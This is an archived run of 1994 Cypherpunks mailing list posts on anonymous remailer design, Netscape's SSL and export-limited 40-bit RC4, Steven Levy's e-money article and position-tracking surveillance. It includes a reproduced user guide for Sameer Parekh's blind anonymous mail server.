Subject: Broadcasts and the Rendezvous Problem
In-Reply-To: <199412112203.RAA24716@bb.hks.net>
Message-ID: <199412112210.OAA10976@netcom4.netcom.com>

L. Todd Masco wrote:

> Seems to me that one of the fundamental building blocks necessary to
> a host of anonymous services is a means of rendezvousing in a manner that
> is not vulnerable to traffic analysis.
>
> The obvious solution to this is through the use of a broadcast medium.
> Has anybody created an alt.* group purely for remailer-associated
> rendezvous?

Isn't this what "alt.anonymous.messages" is all about?
(It's been at my Netcom site for many months now...I don't recall who created it, but it seems to me it was one of us.)

Miron Cuperman ran a message pool for a while....I don't know the current status.

Other options exist, but all are lightly-trafficked. When more users are using them, expect more such places.

> Folks spend a lot of time bemoaning the transience of specific instances
> of remailer nodes: why not turn this into an advantage by architecting
> a network of system that is resilient against the destruction and/or
> compromise of individual nodes?

I'm not sure what you mean by this. More remailers are always a good thing, and offshore sites are especially good, but I'm not sure what you mean by your last point.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From steven at echonyc.com Sun Dec 11 14:23:26 1994
From: steven at echonyc.com (Steven Levy)
Date: Sun, 11 Dec 94 14:23:26 PST
Subject: comments on emoney story
Message-ID: <199412112221.RAA17990@echonyc.com>

There's been a few comments about my Emoney story in the December WIRED and I thought I'd clarify a couple of things.

FROM JOHN YOUNG:

>And, yes, for the Chaum-uncharmed, Mr. Chaum was rude to Mr.
>Levy. Whether Mr. L. is rude in kind to Mr. C. is an exercise
>left to the reader.

For the record, I didn't consider Chaum rude to me. Actually our interviews (which were considerably lengthy) were quite cordial and not at all contentious.
In fact, I think gracious would be a better way to describe Chaum's behavior towards me. Perhaps John is thinking that David's reticence to publicly talk about some personal stuff is akin to rudeness. If that's what came out in the story, it was certainly unintentional.

And I certainly hope I was not rude to Chaum in the article. I tried to portray him fairly, give him his say, and explain his work so that people would agree with me that it is extremely important. BTW, Chaum has indicated that he had no problem with the article.

FROM KAWIKA DAGUIO:

> > > > *******************************
>Whoa! Much of content of the discussions I had with Mr. Levy
>concerned the importance of protecting privacy and security for
>everyone. None of those comments made the cut. Yes, I have
>concerns about fully anonymous digital cash, but while I am not a
>full on crypto-anarchist, neither am I a crypto-fascist.

I confirm this, and it wasn't my intent to make Kawika a crusader against anonymity, but someone who, as he says, has concerns about anonymous cash.

I've gotten some good feedback on the article, but unfortunately on the bio line Wired misspelled my email address (!) so I'm probably missing some of the best remarks.

_______________________________________________________
Steven Levy
steven at well.com
steven at echonyc.com
author, Hackers, Artificial Life, Insanely Great
contributor, Macworld, Wired
"When the going gets weird, the weird turn pro."
_______________________________________________________

From marca at mcom.com Sun Dec 11 14:27:01 1994
From: marca at mcom.com (Marc Andreessen)
Date: Sun, 11 Dec 94 14:27:01 PST
Subject: BofA+Netscape
In-Reply-To:
Message-ID: <199412112227.WAA23971@neon.mcom.com>

In article <199412091814.NAA07757 at hermes.bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) wrote:

> It is my personal feeling that Netscape doesn't have the right
> talent mix to develop secure software. For example, they may well get
For example, they may well get > the RSA parts right, and then store the passphrase in a text file, > 'for ease of use.' My goodness, that's a bit malicious and unsubstantiated, isn't it? Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From marca at mcom.com Sun Dec 11 14:32:19 1994 From: marca at mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 14:32:19 PST Subject: BofA+Netscape In-Reply-To: <199412091814.NAA07757@hermes.bwh.harvard.edu> Message-ID: <199412112232.WAA24075@neon.mcom.com> In article <199412091849.KAA01760 at netcom15.netcom.com>, tcmay at netcom.com (Timothy C. May) wrote: > Netscape is seeking people to write this stuff, as we heard at the > last Cypherpunks meeting. So, this is the chance for Cyppherpunks to > see it done right. Absolutely. We certainly welcome any level of comments and criticism about the SSL protocol and our implementation, and we're recruiting for one or two more security experts to join us -- we'll be doing quite a bit of more advanced crypto over the next couple years, if all goes well. If anyone's interested, please drop me a note. (I should have sent info on what we're doing to this list sooner, btw -- I can only plead being busy as hell for the last 6 months trying to get the company up and running.) > I will speculate that Netscape, being a _very_ high-visibility > company, is in contact with the folks at RSA Data Security about this, > perhaps even using them to do the integration. (Recall that Bidzos is > involved in a couple of efforts along these lines.) They're certainly helping us, reviewing our proposals, etc. > (Ultra-speculative scenario: If I were the NSA/FBI/COMINT > establishment, anxious to ensure "escrowed access," Netscape is > something I'd be looking at. Ultra-speculatively, we should be on the > lookout for any evidence that Netscape will be deploying any kind of > "software key escrow" scheme, e.g., any links to the TIS proposals, to > Denning, etc. "GAKscape"?) 
No plans so far...

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From lmccarth at ducie.cs.umass.edu Sun Dec 11 14:38:49 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 11 Dec 94 14:38:49 PST
Subject: DDJ on RC5
Message-ID: <199412112243.RAA25090@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Alan Olsen writes:
> The January 1995 issue of Dr. Dobbs has two articles of interest.
[...]
> - An article on RC5 by Ron Rivest! (Which includes source code!)

Does it differ substantially from the code in the preprint, ftp://theory.lcs.mit.edu/pub/rivest/rc5/rc5.ps ?

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLut/PGf7YYibNzjpAQG6UwP/SR+SJoimlppN79PrW2B3W8otK3ZbkQX7
YTbdIy84mloYHLTLpY+XnzTSJ+yY6rarqi/QFia2MNpKoLySBmRVFU2LuGcZyj+b
Xh3w7GPqJF3Re2acfdRicIjY3QTU3dryTqC9v9qEq90rCGWXZAHryoV7ALwPnoG0
UvxogTSS2bY=
=5twK
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuuAdSoZzwIn1bdtAQHqdQF+MMVvMfQgFJF7sne7Dn0ACypFccBbWjgn
TOc7YK2sL5RxxzNGyB+Bid+50vNT0rIt
=1Fv5
-----END PGP SIGNATURE-----

From marca at mcom.com Sun Dec 11 14:38:53 1994
From: marca at mcom.com (Marc Andreessen)
Date: Sun, 11 Dec 94 14:38:53 PST
Subject: BofA+Netscape
In-Reply-To: <199412101803.KAA06370@desiree.teleport.com>
Message-ID: <199412112239.WAA24162@neon.mcom.com>

In article <199412101803.KAA06370 at desiree.teleport.com>, alano at teleport.com (Alan Olsen) wrote:

> If you check their WWW page, you will find information on the Secure Sockets
> Layer. It explains the algorithm used (RC4) and key size (40 bits).

SSL allows a number of choices for both algorithm and key size. See http://home.mcom.com/info/SSL.html.
The version of Netscape you can pick up from our FTP server only implements 40-bit RC4 -- the 40-bit part resulting from standard export restrictions. We have implemented and will be shipping clients and servers with 128-bit RC4 and other configurations.

Cheers,
Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From marca at mcom.com Sun Dec 11 14:40:26 1994
From: marca at mcom.com (Marc Andreessen)
Date: Sun, 11 Dec 94 14:40:26 PST
Subject: BofA+Netscape
In-Reply-To: <199412101803.KAA06370@desiree.teleport.com>
Message-ID: <199412112240.WAA24193@neon.mcom.com>

In article <9412102351.AA09781 at snark.imsi.com>, perry at imsi.com wrote:

> 40 bit RC4 will not stop any attacker with even moderate resources;
> it's crap.

Agreed -- that's for the export version. US-only versions of both the client and the server will use higher key lengths.

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From cactus at hks.net Sun Dec 11 14:43:22 1994
From: cactus at hks.net (L. Todd Masco)
Date: Sun, 11 Dec 94 14:43:22 PST
Subject: Broadcasts and the Rendezvous Problem
Message-ID: <199412112248.RAA25113@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May writes:
> Isn't this what "alt.anonymous.messages" is all about?
>
> (It's been at my Netcom site for many months now...I don't recall who
> created it, but it seems to me it was one of us.)

Alas, it is not available at MIT. I'll have to scrounge for a server that carries it (volunteerings of feeds welcome!); Though netcom is our IP provider, I'd rather not get news from them.

> > Folks spend a lot of time bemoaning the transience of specific instances
> > of remailer nodes: why not turn this into an advantage by architecting
> > a network of system that is resilient against the destruction and/or
> > compromise of individual nodes?
>
> I'm not sure what you mean by this.
More remailers are always a good
> thing, and offshore sites are especially good, but I'm not sure what
> you mean by your last point.

(Following details of the current system might be wrong. Please correct me where necessary.)

My thought is this: If we were to design and implement a system, perhaps a two-tiered system with "fortress" and "intermediary" remailers as has been suggested, it's desirable to build a system that will continue to work even if a large portion of the nodes are removed (whether by Earthquake or Sun Devil). This is the system we'll have to build if we stop resisting the notion that remailers regularly come and go with little warning.

The rendezvous problem is not currently addressed in a satisfactory way: premail/remailer-ping, or its equivalent, hardwires in the location of a known set of remailers and finds the subset that corresponds to remailers having a common characteristic (usually just whether they're working reliably or not).

That's not a very good approach: a human has to add a new remailer into the "net" by adding it to the systems polled. Not only is the human intervention a Bad Thing, but having a central registry of remailers is bad infrastructure. A more "web-of-trust"-like mechanism is desirable.

So, a dispersed view of the remailer net, both entry points and intermediary points, is necessary. In order to build such a system, we must solve the rendezvous problem: how does "premail++" know where to send its mail and how does remailer A know where to find remailer B (and B find exit point C)?

This is where my train of thought dovetails with the newsgroup question: bringing a new remailer on line could be achieved by broadcasting a message through a newsgroup specifying the location and type of the remailer. If necessary, one or more pseudonymous automatic testing agents could pick up the message and put the remailer through a barrage of tests, broadcasting a "remailer certification" with a certain duration.
"Premail++" and remailers could find their next hop by examining current certifications and choosing one with desired characteristics, scoring by trusted testing agents and other criteria (including the passage of time since the last certification). If an exit-remailer is chosen early in the game, multiple paths to the exit-remailer can be used to improve reliability (exit-remailers would also probably have a shorter cycle of certification).

Technically, this is feasible. I could write the code fairly easily (though I'm not offering to do so at this time: if I do, pieces will be offered as fait accompli). My question is whether this strikes anybody else as a desirable design: we would end up with a net of remailers that is fairly resilient and not dependent upon any one list of remailers. If a node goes down, the net adjusts in rather short order and service is not disrupted.

This picture needs to be fleshed out a bit more, but I thought I'd bounce this around before solidifying it in any particular way.

- --
Todd Masco       | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com  | neither more nor less.'" - Lewis Carroll
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuuBmSoZzwIn1bdtAQEI9QF/fX2LPoUwzlKYJqJ1s0vb/mIX4NzT1jOo
UNHdiOYNJ+vgpPQyIZ9OQynMuKfSVgU/
=vn6H
-----END PGP SIGNATURE-----

From marca at mcom.com Sun Dec 11 14:44:36 1994
From: marca at mcom.com (Marc Andreessen)
Date: Sun, 11 Dec 94 14:44:36 PST
Subject: BofA+Netscape
In-Reply-To: <9412111550.AA29913@cfdevx1.lehman.com>
Message-ID: <199412112245.WAA24292@neon.mcom.com>

In article <9412111647.AA23311 at tadpole.tadpole.com>, db at Tadpole.COM (Doug Barnes) wrote:

> I'll throw in that from the perspective of someone running a server,
> their approach of requesting all graphics simultaneously over
> different sockets in the name of client performance is disastrous.
> This causes most servers to fork N times more per page, where N is
> the avg. # of graphics.

That's just plain not true. Servers don't fork any more often with Netscape than they do with other clients -- EVER.

> but some have speculated that this was done deliberately in order
> to sabotage server software other than their own.

That's also just plain not true, and completely unsubstantiated.

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From rah at shipwright.com Sun Dec 11 14:48:36 1994
From: rah at shipwright.com (Robert Hettinga)
Date: Sun, 11 Dec 94 14:48:36 PST
Subject: Real-time surveillance of the police
Message-ID: <199412112247.RAA10653@zork.tiac.net>

At 2:04 PM 12/11/94 -0800, Timothy C. May wrote:

>This was an idea explored in detail by David Brin in 1990 in his novel
>"Earth." Video cameras are ubiquitous and have a major effect on
>casual street crime.

Hard to forget Brin's description of little old ladies sitting on their front porches, "armed" with full-sensoria headgear, laying in wait for extremely uneducated juvenile miscreants... Humorous.

>This scenario is a likely way that "position escrow" will evolve, from
>a voluntary escrowing (incl.
timestamping, etc.). "Those with nothing
>to hide" will agree to escrow their movements...this will exculpate
>them in suspected crimes, etc. A slippery slope.

In "City of Angles", Kim Stanley Robinson(?) talks about just a virtuous all-surveilling governmental "privacy" authority which is supposed to "protect" your privacy from the police, who had to subpoena the information to get it.

>
>On the topic of how these localizers actually work, I'm not at liberty
>to talk about the technology. It's novel, and uses a *lot* of digital
>signal processing. It doesn't use GPS and it's not a variant of
>cellular telephones.

I wonder if they're using an active/transponder system. That's what O'Neill's Geostar system was designed with in the early '80's. It would have put up cheaper satellites and smaller earth transponders. The way you saved on transponder size was with very small bursts at very high power. You could send a signal to a small net of satellites 30,000 miles up with a box initially no bigger than an HP12C, and which would shrink more with time.

The feds never liked Geostar 'cause they already had the passive/receiver GPS in the works, and they wanted to "amortize" the social cost of an essentially military (hence the requirement for a passive system) system on the backs of commerce. The only thing which saved GPS for mere mortals like us was the MIC's usual severe underestimate of Grove's Law and the exponential cost effectiveness of integrated circuits over time.

If my hunch is correct, with lots more local antennas, the power requirements of the transceiver, and as a result, the transceiver size, gets pretty small. Small enough to be worn on one's ankle.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                     someone who drinks too much and sees
Boston, MA 02331 USA                   snakes."
-- Bertrand Russell
(617) 323-7923

From adam at bwh.harvard.edu Sun Dec 11 15:02:40 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sun, 11 Dec 94 15:02:40 PST
Subject: BofA+Netscape
In-Reply-To: <199412112227.WAA23971@neon.mcom.com>
Message-ID: <199412112302.SAA22764@bwh.harvard.edu>

Marc Andreessen wrote:

| In article <199412091814.NAA07757 at hermes.bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) wrote:
|
| > It is my personal feeling that Netscape doesn't have the right
| > talent mix to develop secure software. For example, they may well get
| > the RSA parts right, and then store the passphrase in a text file,
| > 'for ease of use.'
|
| My goodness, that's a bit malicious and unsubstantiated, isn't it?

Maybe, but one, you substantiate it yourself, and two, I did say it is my personal feeling. I'll expand on it slightly by pointing to the fact that there have been potentially serious bugs in Mosaic. That's understandable, writing really secure software that does lots of stuff based on potentially malicious input is a tough task. The fact that it is understandable does not make it acceptable.

Until you hire the experts mentioned below, I'll continue to assume that your talent mix does not include said experts.

In message <199412112232.WAA24075 at neon.mcom.com> Marc Andreessen writes:

>Absolutely. We certainly welcome any level of comments and
>criticism about the SSL protocol and our implementation, and
>we're recruiting for one or two more security experts to join
>us -- we'll be doing quite a bit of more advanced crypto over
>the next couple years, if all goes well. If anyone's
>interested, please drop me a note.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From jamesd at netcom.com Sun Dec 11 15:09:19 1994
From: jamesd at netcom.com (James A.
Donald)
Date: Sun, 11 Dec 94 15:09:19 PST
Subject: BofA+Netscape
In-Reply-To: <199412112239.WAA24162@neon.mcom.com>
Message-ID: <199412112308.PAA28264@netcom10.netcom.com>

Amanda complained that Netscape pisses all over the standardization committees.

Well guys, the victor has room to move.

It must come as a big shock to Apple, Microsoft, and IBM, but reality is that Netscape can set WWW standards and they cannot. If they indulge the standardization committees by listening to them first, and then deciding to ignore them, the committee should be thoroughly grateful.

Marc Andreessen:

Hey Marc, you are at netscape. Please, tell them about Debug Windows. Tell them that when debug windows issues a "Fatal Exit" error message this means that Netscape has trashed internal windows data, and that Windows may crash at any moment for any reason.

There are no benign "Fatal Exit" warnings. If it does not crash your system, it will crash a customer's system.

I now have a policy of rebooting after every use of Netscape. This is really bad -- though not as bad as waiting for Mosaic to finish slooooowwwwwwwwwly loading some huge document.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from the
arbitrary power of the omnipotent state.                jamesd at netcom.com

From tcmay at netcom.com Sun Dec 11 15:16:08 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Sun, 11 Dec 94 15:16:08 PST
Subject: Real-time surveillance of the police
In-Reply-To: <199412112247.RAA10653@zork.tiac.net>
Message-ID: <199412112314.PAA12746@netcom14.netcom.com>

Robert Hettinga wrote:

(quoting me)

> >On the topic of how these localizers actually work, I'm not at liberty
> >to talk about the technology. It's novel, and uses a *lot* of digital
> >signal processing. It doesn't use GPS and it's not a variant of
> >cellular telephones.
>
> I wonder if they're using an active/transponder system. That's what
> O'Neill's Geostar system was designed with in the early '80's. It would
> have put up cheaper satellites and smaller earth transponders. The way
> you saved on transponder size was with very small bursts at very high
> power. You could send a signal to a small net of satellites 30,000 miles up
> with a box initially no bigger than an HP12C, and which would shrink more
> with time.

I don't plan to say much more, and won't be playing the "Twenty Questions" game, but the system does _not_ use satellites or anything of that sort. Satellites up the ante considerably, and aren't even needed. Radio is enough to get 1% positional accuracy (or better) and radio can have better coverage in many places that GPS-like systems can't reach.

> the backs of commerce. The only thing which saved GPS for mere mortals like
> us was the MIC's usual severe underestimate of Grove's Law and the
                                                 ^^^^^^^^^^^
> exponential cost effectiveness of integrated circuits over time.

A minor nit, but that's "Moore's Law," an empirical observation made by Gordon Moore, a founder of Intel and current Chairman, that integrated circuit capacities (roughly, number of transistors, bits, gates) were quadrupling every two years or so. Gordon had this posted outside his cubicle (the guy was worth $300 million then, and he worked in a Westinghouse-walled cubicle....I thought that was carrying egalitarianism a bit far...he's now worth $1.5 billion) and we all wondered when the trend chart would be broken. So far, it's been pretty accurate.

But of course his trend chart ("Moore's Law," so dubbed by pundits around 1970, when he first showed his chart) is a conflation of a huge number of interesting trends in lithography, capital spending, microprocessor consumption, etc.

> If my hunch is correct, with lots more local antennas, the power
> requirements of the transceiver, and as a result, the transceiver size, gets
> pretty small.
Small enough to be worn on one's ankle.

The transceivers get real small for other reasons, not because of satellites. Think about this: no reason to have satellites 100 miles overhead if there are thousands or tens of thousands of cooperating units nearby....

I won't say more for now about this, even though the patent filings may be accessible, and the work has been described at "Hackers" and a few other places (including Washington, at ARPA, who is also funding them--gulp).

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From lmccarth at ducie.cs.umass.edu Sun Dec 11 15:17:03 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 11 Dec 94 15:17:03 PST
Subject: Remailing Services Questions
Message-ID: <199412112321.SAA25454@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Anonymous writes:
> If you can, please also let us know if there is a way for us to subscribe
> via an anonymous remailer to an address we designate, like for instance
> with the command
>
> subscribe special at address.here
>
> where the special address given is obviously different from the one in the
> header of the subscription message (which would merely be a remailer).

Could you explain this a bit more? I'm not sure what you're asking.

> Does anyone know more about Sameer's C2-services?
> In the interest of widespread usage, please post a summary to the entire
> cypherpunks-list. Also urge others to copy, forward and post elsewhere.

First, here's an excerpt from http://www.c2.org:80/services/:

- - --- begin included text -----------------------------------------------------

Fully blind anonymity

If you want to protect your privacy and still have mail go to your normal mailbox (either at work, at school, or through any other way you get internet mail), you can sign up for the blind anonymous server. You can set up an alias with us and mail to your alias will get to you, even though we have *no* idea who you are or where mail to you ends up going. This is available for only $10 for about every five megs of traffic which goes through the system. When you sign up you will get about one meg of free traffic. Also available is a Blind Server Client to make things easier.

- - --- end included text -------------------------------------------------------

I reproduce below the current contents of http://www.c2.org/services/blindserver.html:

- - --- begin included text -----------------------------------------------------

The Blind Anonymous Server
by Sameer Parekh
Copyright 1994

Introduction

I hatched up the Blind Anon Server because of Eric Hughes's comments about the safety in ignorance. I wanted to run an anon server, maybe similar to Julf's remailer, but I did *not* want to know the connection between anon-ids and real IDs. I still wanted it to be easy to use so that someone who wanted to send mail to an anonymous person need only send it to a standard mail address, instead of using Hal's remailer return address block, which is an incredible pain to use.

The system I have hatched up is relatively secure. If you take the proper steps to secure your identity from me, even if I were keeping complete logs, I would still know nothing of your true identity and if my records were subpoenaed, I could freely hand over the contents of my records without any worry that the privacy of my users will be violated.

The system requires all commands to be pgp signed.
Thus you will create a public/private keypair for your anonymous identity, and all administrative commands to the list regarding this identity must be signed by that key. You can send list commands from any address-- an anon remailer, a friend's address, Julf's remailer, whatever.. and as long as it is signed by your identity's key, all will be well.

If you don't want to deal with every detail of the server, you can just use the blind client program that's been written to make using the server much easier.

Setup

First you have to create your alias on the anonymous server. Creating the alias is easy, but setting it up to work right takes a bit of effort and bookkeeping on your part. (Maybe I'll write a client which can take care of all the bookkeeping.)

Create a pgp keypair with a User ID of the form "Pseudonym ". Send your public key to admin at omega.c2.org with the subject line, "addkey". This will create for you an anonymous id which can be accessed via "alias at omega.c2.org". You should only send one key to the server in any single addkey request.

You have to choose an account name which hasn't been used before. In order to get the list of all account names which have been used and are not available, send a message with the subject "sendused address" to admin at omega.c2.org and the list of unavailable names will be sent to address, with the body of your request tacked on to the top, so you can use a remailer for the "address" and the body can be an encrypted mailing block-- you need not reveal your identity to me in any case.

Starting an account gives you 1000 credits.

Now if you would like to send a message to someone from your newly formed alias, you can send a signed message to the administration address (admin at omega.c2.org) with the "mailmessage" command. For example:

::mailmessage
To: barney at black.net
Subject: here's the plans to the stealth bomber
Keywords: bomber

Here's the plans...
- - --END OF MESSAGE--

The message will be sent out from omega.c2.org just as if you had sent it out using a standard mail program from omega.c2.org.

Then comes the more complex part. You have to tell my anonserver how mail to your alias will actually get to you. There are various levels of security which you can use. Because the remailernet is not very reliable, the idea is that you setup a number of paths which mail can get to you through, so that if one path goes down you can still use the other paths to get mail. You can either configure it so that mail to you goes through every path (for reliability with less security) or one path chosen at random (more secure but less reliable).

To add a path to your list of paths, you must send a signed message to the list, with the lines

::addpath firsthop
PATH INFORMATION GOES HERE
- - --END OF PATH--

The firsthop is the first hop along the path between my anon server and you. It can be your address, in which case there is a good deal of reliability, but you get absolutely no good security. The "path information" is what gets tacked onto the top of the body before the message gets sent to the first hop. Suppose your firsthop was Hal's remailer, hfinney at shell.portal.com.. You would have something like:

::addpath hfinney at shell.portal.com
::
Encrypted: PGP

- - -----BEGIN PGP MESSAGE-----
Version: 2.3a

hEwCKlkQ745WINUBAfwPrO+z9LMBz7boyyC7gUqX/QCEZkXmJCeZYoskgtH5qqbi
y4mYUL5a0ApbzrhPs8ULkPnW2c4Pfr1AfYSSgvrzpgAAAEvJtPOuQsW8IVQfl+iW
CAr2gd5jax+t75qbux5U/RRxlbsq4cOeGrO/i/6Km6m71Vsdj0rquEQBvREnXxdj
81YsBM9QlFNxQAB8rrQ=
=Ylli
- - -----END PGP MESSAGE-----
- - --END OF PATH--

That pgp message is encrypted for Hal's remailer. When Hal's remailer gets the message, it will have this block on the front of the body. Hal's remailer can then decrypt it.. Maybe on the inside of this block you can put:

::
Anon-Send-To:

So then there's only one remailer on the chain between myserver and your real address.
For more security you can embed *another* hop to another remailer with another encrypted address block. This can continue for as long as you want. The longer the path, the more secure, but the less reliable.

Once the path has been added, you will be sent mail (through the anon server) encrypted with your key (all mail to your alias will be sent out encrypted with your key) with the pathnumber that your command created. Store this path number in a safe place, because you will need to use it when you test all your paths for reliability. You can create multiple paths in this fashion.

The remailer defaults to "spray" mode-- this means that mail to your alias will be sent through *each* of your paths. This adds reliability at the expense of security. (It makes traffic analysis easier.) If you would like to turn off spray mode, send a command to admin at omega.c2.org:

::randmode

To turn spray mode on:

::spraymode

You can actually use this spray mode for more than just an anon-server. If you'd like to create a mailing list, you can generate a keypair, distribute to everyone on the mailing list the secret key, and everyone can send into the anon server a path to themselves. Using spray mode, mail to the address will go out to every path. This of course means that anyone can subscribe or unsubscribe (Removing paths is described below) people to/from the list.

The Credit Scheme

When you start up an account, you get 1000 credits. When mail is sent out along one of the paths, credit is deducted from the account-- 1 credit per 512 bytes of traffic. Note that if you are in spray mode credits are deducted for every path which is active for your alias.

If your account does not have enough credit, when a message comes in you will get mail detailing the size of the message that was lost and the amount of credits you have in your account. (Size is listed in 512 byte blocks)

More credits will be added to your account upon receipt of payment for additional credits to your account.
The one thousand credits is in general enough to take care of occasional mail using the 'nym. Only if you use the 'nym heavily should you expect to run out of credits.

Removing paths

If a certain path which you have active flakes out and becomes ineffective, you need some way of turning that path off so you're not paying for it in spray mode, and so you don't lose mail in random mode. That's what the disablepath command is for. To run the disablepath command you simply send the command (signed, as always) to admin at omega.c2.org:

::disablepath pathnumber

Pathnumber, here, is the number of the path which was assigned when you created that path. Hence it is useful for you to keep good records of your active and disabled paths.

It is possible to reenable a path once it has been disabled. In order to do this you need to remember the path number and the remailer that it's associated with. To recover a path you just send:

::recoverpath firsthop pathnum

And the path with the number pathnum is reactivated, with the firsthop that you give it in the recover command.

Path Verification

You will likely want to keep tabs such that you know when a given path flakes out on you. For this reason the "regping" option is available. This command lets you tell the system how often you want the anon-server to send a message through every path of yours, with the pathnumber in the message (encrypted, of course) so that you can keep tabs on which paths are flaking out on you. To set your ping frequency, use the regping command:

::regping frequency

Where frequency can be none, hourly, daily, weekly, or monthly. Remember that you are still being charged for these testpings. The system defaults to weekly.

To get a list of all your active paths, use the command "showpaths".
This command will send out a listing of the pathnumber and first hop of each of your active paths:

::showpaths

Defeating Traffic Analysis

The system works in concert with remail at c2.org, which does the work to defeat traffic analysis. All mail to each path is first sent through remail at c2.org for added difficulty in traffic analysis.

remail at c2.org is a standard cypherpunks remailer with PGP with a few added features. All outgoing mail is not delivered immediately upon receipt. Outgoing messages are stored in a pool until five minutes after each hour, when all messages in the pool are delivered in a random order, ignoring the order in which they came in.

Every minute there is also a chance that a random uuencoded message is injected into the remailernet. Each message injected into the remailer net is sent through a random path of the remailers in the remailernet, usually between five and 20 hops.

--- end included text ------------------------------------------------------

> Last, I support the idea of a while ago that the remailer-operators mailing list should be open for public subscription so all those interested can get on and follow what is happened there. But how do we subscribe?
> Let us know, Sameer!

remailer-operators is a Majordomo-managed list. Send mail to majordomo at c2.org with "subscribe remailer-operators" in the body to subscribe to the list. The list address is (surprise) remailer-operators at c2.org.

Hope this helps. I don't know anything about the Extropia message pool, sorry.

-L.
Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From lmccarth at ducie.cs.umass.edu Sun Dec 11 15:22:19 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Sun, 11 Dec 94 15:22:19 PST
Subject: Netscape competence
Message-ID: <199412112326.SAA25467@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Marc Andreessen writes:
> In article <199412091814.NAA07757 at hermes.bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) wrote:
>
> > It my personal feeling that Netscape doesn't have the right talent mix to develop secure software. For example, they may well get the RSA parts right, and then store the passphrase in a text file, 'for ease of use.'
>
> My goodness, that's a bit malicious and unsubstantiated, isn't it?

Excuse me, but Adam Shostack didn't write that paragraph you quoted. Amanda Walker did, as I recall.

BTW, welcome to the list....

-L.
Futplex McCarthy

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From marca at neon.mcom.com Sun Dec 11 15:22:31 1994
From: marca at neon.mcom.com (Marc Andreessen)
Date: Sun, 11 Dec 94 15:22:31 PST
Subject: BofA+Netscape
Message-ID:

At 3:08 PM 12/11/94, James A. Donald wrote:
>Amanda complained that Netscape pisses all over the standardization committees.
>
>Well guys, the victor has room to move. It must come as a big shock to Apple, Microsoft, and IBM, but reality is that Netscape can set WWW standards and they cannot.
>
>If they indulge the standardization committees by listening to them first, and then deciding to ignore them, the committee should be thoroughly grateful.

For the record, we're not trying to set standards -- we're trying to build products with functionality that our customers want and need. We'll succeed or fail on the basis of whether we do that, not whether or because we set standards.

We fully realize that being proprietary or isolated from existing or future standards only locks us out of our market, which does us no good at all. That doesn't mean that we're not going to innovate when we need to, but it means we're not going to be anything other than totally open and standards-compliant.
To that end, we aggressively support all current standards (HTML, HTTP, URLs, NNTP, Gopher, SOCKS, FTP, you name it), are a charter member of W3O (with a concomitant $150K commitment), and from day 1 have made SSL available to the broader community and have given it to the W3O security working group (of which we are a full participant) exactly in parallel with SHTTP and the three or four other proposals that have been submitted for consideration by other companies and third parties.

I fully expect we'll be supporting other security standards and approaches as they emerge, and we certainly welcome realistic suggestions on what we should do, when, and how.

Cheers,
Marc

--
Marc Andreessen
Netscape Communications Corporation
Mountain View, CA
marca at mcom.com

From lmccarth at ducie.cs.umass.edu Sun Dec 11 15:25:38 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
